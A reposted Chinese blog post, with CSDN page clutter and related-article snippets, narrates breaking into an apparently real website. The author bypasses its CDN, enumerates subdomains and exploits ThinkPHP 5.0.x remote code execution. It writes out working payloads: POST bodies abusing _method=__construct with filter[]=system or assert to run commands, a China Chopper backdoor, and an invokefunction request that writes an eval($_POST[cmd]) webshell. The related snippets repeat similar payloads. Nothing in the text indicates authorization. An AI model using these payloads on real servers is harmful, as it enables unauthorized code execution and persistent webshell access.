tp5.0x代码执行

最新推荐文章于 2024-07-26 17:57:56 发布
最新推荐文章于 2024-07-26 17:57:56 发布
阅读量340 收藏
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/websecyw/p/10309803.html
版权

1.拿到站首先平复一下心情

看了一下robots.txt结构像dedecms,网站还存在CDN,日了狗看到这里其实都想放弃来着,懒癌晚期,然后接着使用云悉平台走了一波,看了一下得到真实IP,看来只给www做了cdn其他子域名并未做,

 

然后看着子域名这么多,然后接着要做的就是挨个点一遍,寻找薄弱点,大部分都打不开,其中还有几个打开直接跳转到主站,忽略,找到个看着就像有漏洞的网站,随手测试了一下单引号,好的没报错,果然不出我所料,尴尬。

好了,放在一边接着看,看到一个很熟悉的标题,系统发生报错,这不就是tp的报错信息么。

 

 

没错还是这个熟悉的配方熟悉的页面,根据我30多年的渗透测试经验来看,这个站就要被我拿下了,

哼,不过如此。

掏出不知道从来搜索出来的paylaod一顿怼,没错一如既往的被打脸,

http://127.0.0.1/index.php?s=captcha首先测试这个方法是否存在

post:_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls -al

根据回显出来的信息感觉执行的函数被禁用掉了

http://127.0.0.1/index.php?m=1
POST:_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=

成功执行phpinfo,呵,不过如此。其实内心慌得一批。

 

http://127.0.0.1/index.php?m=assert($POST[1])
POST:method=__construct&filter[]=assert&method=get&server[REQUEST_METHOD]=
password:1

菜刀构造数据包

 < O >123< /O> (去掉空格)

 ##小姿势:

thinkphp 5.0.21被拦截,可以采用写文件方式。

GET请求t

?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=1.php&vars[1][]=<?php eval^($_POST[cmd])?>

 

 

转载于:https://www.cnblogs.com/websecyw/p/10309803.html

weixin_30950607
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ThinkPHP5.0.23 远程代码执行漏洞
cyzCc的博客
02-15 5550
靶场地址【安鸾渗透实战平台】http://www.whalwl.cn:8031 提示:flag在服务器根目录 直接在kali里面搜索ThinkPHP5.0.23相关漏洞 发现了 Remote Code Execution(远程代码执行漏洞) 将该漏洞cp到tp.txt文件并查看 在最下面发现该版本payload (post)public/index.php?s=captcha (data) ...
Thinkphp5-0-X远程代码执行漏洞
qq_40624810的博客
11-09 822
参考博客:https://www.cnblogs.com/303donatello/p/12721587.html https://blog.csdn.net/qq_45521281/article/details/105907276 其实后面的&test=-1参数没有意义,只要有captcha就行 在post里加上我们要提交的参数 _method=__construct&filter[]=phpinfo&method=GET 提交...
phpinfo 命令执行函数被禁用绕过tips
yggcwhat
06-02 1622
phpinfo 命令执行函数被禁用绕过tips
ThinkPHP5系列远程代码执行漏洞复现(详细)
weixin_53730939的博客
03-20 8328
ThinkPHP5系列远程代码执行漏洞复现(详细)
thinkPHP5 最新代码执行漏洞
xiaoziabc的博客
01-13 2804
s=captcha _method=__construct&amp;filter[]=system&amp;method=get&amp;server[REQUEST_method]=dir   http://127.0.0.1/tp5.0.12_full/public/index.php?s=index/\think\app/invokefunction&amp;function=call...
生命在于学习——框架-中间件的学习(一)
易水哲的博客
09-06 1432
框架-中间件的漏洞学习
内部靶场系列|Cpms
白帽子凯哥聊黑客
05-30 281
如果有文件读写权限,可通过–os-shell 执行os命令 或者 –sql-shell 读取 flag文件。②文章管理--->文章列表--->发布文章处存在文件上传。找到注入点,直接sqlmap ,看是否具有文件读写权限。①根据页面报错,得知该cms是基于tp5二次开发的。首页搜索框处产生的操作行为都会记录到日志文件中。然后刷新页面,获取php文件路径。修改jpg为php,然后放行。③浏览器访问上传的php文件。其实就是复现tp5 文件包含。文件包含,包含当天的日志。1、 后台文件上传。
【漏洞复现】[ThinkPHP]2-Rce
Mr_atopos的博客
05-22 709
在BUU上复现 [ThinkPHP]2-Rce
TP5.0完全开发手册WORD版
11-02
TP5.0完全开发手册WORD版本。 ThinkPHP是一个免费开源的,快速、简单的面向对象的轻量级PHP开发框架,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色...
TP5.0微信支付.zip
07-28
标题“TP5.0微信支付.zip”所指的是一款基于ThinkPHP 5.0框架的微信支付扩展包。ThinkPHP 5.0是中国最流行的PHP框架之一,它提供了丰富的功能和简洁的API,使得Web应用开发更为高效。微信支付则是腾讯公司提供的在线...
PHP 使用TP5.0 实现SSO单点登录
07-28
因为公司要实现SSO单点登录的效果,最近在网上找了一些资料,但是都没有好用的, 所以自己用PHP 使用TP5.0 实现了SSO单点登录,可以跨多个域名。 下载后在本地配置好 A,B,C 3个网站,就可以模拟效果了。
TP5.0企业站开发
10-29
TP5.0的企业开发网站,包含视频教程。可以让你在最快的时间内对TP5.0有基础的了解
复现ThinkPHP5 5.0.23远程代码执行漏洞
weixin_56513549的博客
02-21 3352
访问/index.php?s=captcha页面,会出现如下报错: 执行whoami 查看当前目录 _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd 写入一句话木马并访问 aaabbb 这里使用Base64 编码: _method=__construct&filter[]=system&method=get&server[RE...
公司网站有漏洞怎么解决
网站安全专家
01-18 3041
2019年1月14日消息,thinkphp又被爆出致命漏洞,可以直接远程代码执行,getshell提权写入网站木马到网站根目录,甚至直接提权到服务器,该漏洞影响版本ThinkPHP 5.0、ThinkPHP 5.0.10、ThinkPHP5.0.12、ThinkPHP5.0.13、ThinkPHP5.0.23、thinkphp 5.0.22版本。 攻击者可以伪造远程恶意代码,对服务器进行po...
漏洞复现—ThinkPHP 2.x/5.0.x/5.1.x/5 in-sqlinjection 命令执行漏洞
weixin_45556536的博客
11-24 1266
Thinkphp—2-rce一级目录二级目录三级目录涉及版本漏洞复现2-rce 一级目录 二级目录 三级目录 涉及版本 5.0.8-5.0.13 不需要开启debug // payload POST /tp5010/public/index.php?s=index/index/index HTTP/1.1 Host: 127.0.0.1:8000 Content-Length: 52 Content-Type: application/x-www-form-urlencoded s=whoami&a
ThinkPHP 5.0 * 远程代码执行漏洞分析
a1b2c3是弱口令
01-11 1万+
ThinkPHP 5.0 * 远程代码执行全版本通杀 本文主要以官网下载的5.0.23 完整版(thinkphp_5.0.23_with_extend.zip)为例分析。 Thinkphp处理请求的关键类为Request(thinkphp/library/think/Request.php) 该类可以实现对HTTP请求的一些设置。 其中成员函数method用来获取当前请求类型,其定义如下: ...
ThinkPHP5.0.*版本代码执行漏洞
热门推荐
锋刃科技的博客
01-12 3万+
我们先看处理请求的Request类,在thinkphp/ library/think/Request.php。 Method方法来获取当前的请求类型。 isGet、isPOST、isPUT等方法都调用了method方法来做请求类型的判断。 而在默认情况下,是有表单伪装变量的 在默认情况下,该变量值为_method 在Method方法中,将表单伪装变量对该方法的变量进行...
PHP商城案例
最新发布
王世凡的技术博客
07-26 305
http://www.e9933.com/
tp5.0 单元测试
04-09
TP5.0中,单元测试是通过PHPUnit来实现的。PHPUnit是一个流行的PHP测试框架,它提供了一组用于编写和运行测试的类和方法。 要进行单元测试,首先需要创建一个测试类,该类继承自PHPUnit\Framework\TestCase类。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值